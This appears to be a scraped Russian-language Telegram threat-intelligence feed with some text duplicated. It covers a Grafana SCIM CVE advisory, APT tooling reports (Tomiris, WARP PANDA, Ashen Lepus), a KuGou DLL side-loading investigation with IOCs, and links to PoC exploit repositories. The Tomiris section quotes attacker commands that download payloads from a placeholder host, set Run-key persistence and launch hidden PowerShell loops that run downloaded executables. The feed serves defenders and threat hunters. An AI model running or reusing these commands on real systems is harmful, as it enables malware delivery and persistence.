Forwarded from SecuriXy.kz
🚨 CVE-2025-41115 (Grafana Enterprise, CVSS 10.0). Коротко: SCIM включен → риск захвата админки. Обновиться немедленно.
Уязвимость в SCIM provisioning - можно подменить
Затронуты: Grafana Enterprise 12.0.0-12.2.1
Фикс: обновиться до 12.0.6 / 12.1.3 / 12.2.1 (patched) / 12.3.0
✅ Чеклист:
1 Проверить, включен ли SCIM (enableSCIM, user_sync_enabled).
2 Если не нужен - отключить.
3 Срочно обновить Grafana.
4 Мониторить журналы и входы.
PoC: GitHub — Blackash-CVE-2025-41115
Уязвимость в SCIM provisioning - можно подменить
externalId и войти под любым пользователем, включая админа.Затронуты: Grafana Enterprise 12.0.0-12.2.1
Фикс: обновиться до 12.0.6 / 12.1.3 / 12.2.1 (patched) / 12.3.0
✅ Чеклист:
1 Проверить, включен ли SCIM (enableSCIM, user_sync_enabled).
2 Если не нужен - отключить.
3 Срочно обновить Grafana.
4 Мониторить журналы и входы.
PoC: GitHub — Blackash-CVE-2025-41115
🔥6
Forwarded from Threat Hunting Father 🦔
Tomiris new tools
Tomiris перешли на мульти-язычные импланты и массовый уход в публичные C2 (Telegram/Discord). Первичный доступ - фишинг с длинными русскими именами
Формат атаки
Фишинг-архив → EXE с маскировкой под документ → reverse shell (C/C++/Rust/Go/Python/PowerShell) → загрузка AdaptixC2/Havoc → дальнейшая эксплуатация.
Новые особенности
C2 через публичные сервисы:
Discord webhooks → Rust Downloader, Python Discord ReverseShell
Telegram bot API → Python Telegram RS, C# Telegram RS, PowerShell Telegram Backdoor
Многоязычные импланты:
C/C++ ReverseShell (несколько вариантов)
Rust Downloader + Rust ReverseShell
Python Discord RS + Python FileGrabber + Python Telegram RS
C# Telegram RS
Go ReverseShell и Go ReverseSocks
PowerShell Telegram Backdoor
Новая цепочка Rust Downloader:
сбор системной информации → отправка на Discord;
поиск файлов → отправка только путей;
дроп VBS+PS1 → цикл загрузки 1.zip → распаковка → запуск всех .exe.
Активное использование open-source фреймворков:
AdaptixC2
Havoc
Dystopia-C2 (в Distopia Backdoor)
ReverseSocks5-форки (C++ и Go)
Повторяющиеся паттерны доставки:
длинные русские названия .exe
файлы в архивах с паролем формата
одинаковые имена → разные импланты внутри
🔗 https://securelist.com/tomiris-new-tools/118143/
🦔 THF
Tomiris перешли на мульти-язычные импланты и массовый уход в публичные C2 (Telegram/Discord). Первичный доступ - фишинг с длинными русскими именами
.doc<пробелы>.exe. Дальше - ReverseShell → Havoc/AdaptixC2.Формат атаки
Фишинг-архив → EXE с маскировкой под документ → reverse shell (C/C++/Rust/Go/Python/PowerShell) → загрузка AdaptixC2/Havoc → дальнейшая эксплуатация.
Новые особенности
C2 через публичные сервисы:
Discord webhooks → Rust Downloader, Python Discord ReverseShell
Telegram bot API → Python Telegram RS, C# Telegram RS, PowerShell Telegram Backdoor
Многоязычные импланты:
C/C++ ReverseShell (несколько вариантов)
Rust Downloader + Rust ReverseShell
Python Discord RS + Python FileGrabber + Python Telegram RS
C# Telegram RS
Go ReverseShell и Go ReverseSocks
PowerShell Telegram Backdoor
Новая цепочка Rust Downloader:
сбор системной информации → отправка на Discord;
поиск файлов → отправка только путей;
дроп VBS+PS1 → цикл загрузки 1.zip → распаковка → запуск всех .exe.
Активное использование open-source фреймворков:
AdaptixC2
Havoc
Dystopia-C2 (в Distopia Backdoor)
ReverseSocks5-форки (C++ и Go)
Повторяющиеся паттерны доставки:
длинные русские названия .exe
файлы в архивах с паролем формата
xyz@2025одинаковые имена → разные импланты внутри
Разведка и базовые команды
echo 4fUPU7tGOJBlT6D1wZTUk
whoami
ipconfig /all
systeminfo
hostname
net user /dom
dir
dir C:\users\[username]
Загрузка последующих стадий
bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe
curl -o $public\libraries\service.exe http://<HOST>/service.exe
certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar
powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'"
Проверка успешной загрузки
dir $temp
dir $public\libraries
Persistence через реестр
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d $public\pictures\winupdate.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Win-NetAlone" /t REG_SZ /d "$public\videos\alone.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Winservice" /t REG_SZ /d "$public\Pictures\dwm.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurrentVersion /t REG_SZ /d $public\Pictures\sbschost.exe /f
Проверка persistence
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Команды Rust Downloader (запуск через cmd.exe)
cmd /C "ipconfig /all"
cmd /C "echo %username%"
cmd /C hostname
cmd /C ver
cmd /C curl hxxps://ipinfo.io/ip
cmd /C curl hxxps://ipinfo.io/country"
Дроп и выполнение VBS/Powershell скриптов
noscript.vbs:Часть логики noscript.ps1 (цикл загрузки ZIP):
Set Shell = CreateObject("WScript.Shell")
Shell.Run "powershell -ep Bypass -w hidden -File %temp%\noscript.ps1"
Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
tar -xf $env:Temp\1.zip -C $env:Temp\rfolder
Get-ChildItem $env:Temp\rfolder -Filter "*.exe" | ForEach-Object { Start-Process $_.FullName }
Команда загрузки Python FileGrabber
cmd.exe /c "curl -o $public\videos\offel.exe http://<HOST>/offel.exe"
Команды Distopia Backdoor (выполненные оператором)
cmd.exe /c "dir"
cmd.exe /c "dir C:\user\[username]\pictures"
cmd.exe /c "pwd"
cmd.exe /c "curl -O $public\sysmgmt.exe http://<HOST>/private/svchost.exe"
cmd.exe /c "$public\sysmgmt.exe"
PowerShell Telegram Backdoor (вызов дроппера)
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64>
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3
Unveiling WARP PANDA (a.k.a UNC5221): A New Sophisticated China-Nexus Adversary 🇨🇳
WARP PANDA (UNC5221) - china-nexus adversary специализирующийся на атаки на виртуальную инфраструктуру VMware ESXi/vSphere.
В течение 2025 года CrowdStrike отслеживал деятельность группы и выявил новые цепочки атак с использованием кастомных имплантов Junction и GuestConduit, а также бекдора BRICKSTORM⌨️
Что по арсеналу? ⚔️
Indicators of Compromise🔍
🔗 Blog: https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/
🧢 s0ld13r
WARP PANDA (UNC5221) - china-nexus adversary специализирующийся на атаки на виртуальную инфраструктуру VMware ESXi/vSphere.
В течение 2025 года CrowdStrike отслеживал деятельность группы и выявил новые цепочки атак с использованием кастомных имплантов Junction и GuestConduit, а также бекдора BRICKSTORM
Что по арсеналу? ⚔️
BRICKSTORM - Golang backdoor, маскирующийся под легитимные процессы vCenter. Общается через WebSockets/TLS, использует DoH для резолва C2 доменов, прячет C2 за Cloudflare Workers и Heroku. Умеет туннелировать трафик через vCenter/ESXi/VM, управлять файлами и сохранять персистентность даже после удаления.
Junction - имплант для ESXi написанный на Go, работающий как поддельный сервис на порту 8090. Принимает команды через HTTP запросы, выполняет их, проксирует трафик и общается с гостевыми ВМ через VSOCK. Даёт оператору скрытый доступ и возможность проксировать трафик.
GuestConduit - имплант внутри гостевой ВМ, слушающий VSOCK. Перенаправляет и зеркалит трафик между VM и гипервизором, работает с JSON-командами. Используется вместе с Junction для создания скрытых туннелей внутри виртуальной среды.
Indicators of Compromise
40db68331cb52dd3ffa0698144d1e6919779ff432e2e80c058e41f7b93cec042 (GuestConduit)
88db1d63dbd18469136bf9980858eb5fc0d4e41902bf3e4a8e08d7b6896654ed (Junction)
9a0e1b7a5f7793a8a5a62748b7aa4786d35fc38de607fb3bb8583ea2f7974806 (Junction)
40992f53effc60f5e7edea632c48736ded9a2ca59fb4924eb6af0a078b74d557 (BRICKSTORM)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
Forwarded from Freedom Fox 🏴☠
#cve #rce
Microsoft Web Deploy RCE Exploit - CVE-2025-53772
https://github.com/sailay1996/CVE-2025-53772/tree/main
Telegram✉️ @freedomfox
Microsoft Web Deploy RCE Exploit - CVE-2025-53772
https://github.com/sailay1996/CVE-2025-53772/tree/main
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite
Что по арсеналу?🤩
AshenLoader - первичный дроппер🤩
AshenStager - HTML‑загрузчик🤩
AshTag - модульный .NET бекдор🤩
🔗 Post: https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/
🧢 s0ld13r
Unit42 зафиксировала обновлённый стек инструментов Ashen Lepus, ориентированный на дипломатические структуры Ближнего Востока, группа перешла на полностью in‑memory исполнение и доставку модулей через HTML-контейнеры, что заметно усложняет анализ и детект🤩
Что по арсеналу?
AshenLoader - первичный дроппер
Имитирует открытие легитимого PDF, параллельно загружая второй стейдж. Используется как точка входа и маскировка цепочки.
AshenStager - HTML‑загрузчик
Ключевой компонент кампании. Прячет payload в HTML (теги, атрибуты, комментарии).
Тянет конфиг и модули частями, поддерживает обновление функционала без перепаковки.
Содержит anti‑sandbox техники и минимизирует артефакты.
AshTag - модульный .NET бекдор
• Конфиг: Base64 → JSON → AES → XOR
• Загрузка модулей напрямую из HTML‑страниц на C2
• Управление файлами, выполнение кода, загрузка DLL в память
• Кастомный UA, jitter, низкий диск‑след
• Persistence через Scheduled Task
🔗 Post: https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
KuGou signed binary used for malware execution 😎
Давненько не было постов в стиле «давайте поищем», на повестке дня - сервер с open directory, который привлёк моё внимание наличием😤
Данный исполняемый файл подписан валидной цифровой подписью KuGou (популярный китайский музыкальный сервис), что позволяет ему выглядеть как легитимный компонент популярного музыкального ПО и снижает вероятность детекта со стороны СЗИ, ориентированных на доверие к подписи🤩
При запуске🤩
Таким образом, злоумышленники используют легитимно подписанный бинарь KuGou в качестве trusted loader’а, выстраивая цепочку исполнения от🦍
IOC's for hunts
P.S Сам abc.bin не разбирал👩🦰
🧢 s0ld13r
Давненько не было постов в стиле «давайте поищем», на повестке дня - сервер с open directory, который привлёк моё внимание наличием
.bat-скриптов и подозрительных DLL-файлов. Изначальным объектом исследования стал файл 1.bat (Рисунок 1–2), внутри которого были прописаны команды для скачивания остальных бинарных файлов с веб-сервера. Все файлы сохраняются в директорию C:\Users\Public\music, после чего происходит запуск некоего bridge_plugin_host_x64.exe Данный исполняемый файл подписан валидной цифровой подписью KuGou (популярный китайский музыкальный сервис), что позволяет ему выглядеть как легитимный компонент популярного музыкального ПО и снижает вероятность детекта со стороны СЗИ, ориентированных на доверие к подписи
При запуске
bridge_plugin_host_x64.exe происходит подгрузка библиотеки dsp_bridge_x64.dll, расположенной в той же директории, тем самым доказывая наличие Side Load уязвимости. Данный DLL-файл выступает в роли инжектора (Рисунок 4–5), однако фактически является промежуточным загрузчиком. Его основная задача - извлечение и дальнейшая загрузка финального payload’а abc.bin, который и реализует основную вредоносную функциональность Таким образом, злоумышленники используют легитимно подписанный бинарь KuGou в качестве trusted loader’а, выстраивая цепочку исполнения от
.bat-скрипта до финальной нагрузки, маскируя весь процесс под запуск обычного пользовательского ПО IOC's for hunts
Stage server - 149.104.29[.]101
Payloads & malware samples
3c9b98e77067bc272b3c17fdbac17487e0e6821e3ca41a5cb882ee0f56e017a5 - dsp_bridge_x64.dll
7a54eb34d2b408e1b1491f13ed608eba573cd7ea07045da28223b624fcfed964 - bridge_plugin_host_x64.exe
7b26a2d2ecceea1f06696ecf709983c647058462f5a048711ba2ce9449afb4ae - abc.bin
Behavioral Indicators
Создание файлов в C:\Users\Public
Запуск .bat скриптов
P.S Сам abc.bin не разбирал
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Forwarded from FR13NDS TEAM | Channel
🎖️POC CTF 2025 🇰🇷 - Finalists and 4th place
🎖️snakeCTF 2025 Finals 🇮🇹 - 4th place (Real World CTF)
🎖️HackDay 2025 🇫🇷 - Finalists and 6th place
🎖️DEF CON CTF 2025 🇺🇸 - 5th (w/ RePokemonedCollections)
🩸 The First "First Blood" for Kazakhstan on Hack The Box
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍4❤1
Поздравляю всех с наступающим 2026 годом ! 🎄
За этот год мы прошли многое, и хочу поблагодарить каждого из Вас - всех читателей и тех, кто поддерживал контент☺️
В новом году будет много интересного контента, а пока, всем хороших выходных🕺
🧢 s0ld13r
За этот год мы прошли многое, и хочу поблагодарить каждого из Вас - всех читателей и тех, кто поддерживал контент
В новом году будет много интересного контента, а пока, всем хороших выходных
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14
Hey, community! 👋
Всем тем кто в Алмате, очень рекомендую послушать доклад моего хорошего друга illbeback на тему “AI как допинг для Хакера: История победы FR13NDS TEAM на KHS 2025”🇰🇿
📅 Когда: 09.01.2026
🕖 Время: 17:30
📍 Где: г. Алматы, Community Bar
🔗 FR13NDS TEAM: https://news.1rj.ru/str/fr13nds_ctf
🔗 Post: https://news.1rj.ru/str/blackicehackerspace/149
🧢 s0ld13r
Всем тем кто в Алмате, очень рекомендую послушать доклад моего хорошего друга illbeback на тему “AI как допинг для Хакера: История победы FR13NDS TEAM на KHS 2025”
📅 Когда: 09.01.2026
🕖 Время: 17:30
📍 Где: г. Алматы, Community Bar
🔗 FR13NDS TEAM: https://news.1rj.ru/str/fr13nds_ctf
🔗 Post: https://news.1rj.ru/str/blackicehackerspace/149
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤9
Living Off the Pipeline 👩💻
Living off the Land постепенно добрался и до CI/CD пайплайнов. RCE-by-design через CI/CD вполне рабочий вектор атак: supply chain, мисконфиги в сборках и банальное отсутствие ограничений по правам часто позволяют атакующему получить доступ к значительной части инфраструктуры🕺
🔗 LotP Project: https://boostsecurityio.github.io/lotp
🧢 s0ld13r
Living off the Land постепенно добрался и до CI/CD пайплайнов. RCE-by-design через CI/CD вполне рабочий вектор атак: supply chain, мисконфиги в сборках и банальное отсутствие ограничений по правам часто позволяют атакующему получить доступ к значительной части инфраструктуры
The idea of the LOTP project is to inventory how development tools (typically CLIs), commonly used in CI/CD pipelines, have lesser-known RCE-By-Design features ("foot guns"), or more generally, can be used to achieve arbitrary code execution by running on untrusted code changes or following a workflow injection.
🔗 LotP Project: https://boostsecurityio.github.io/lotp
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍4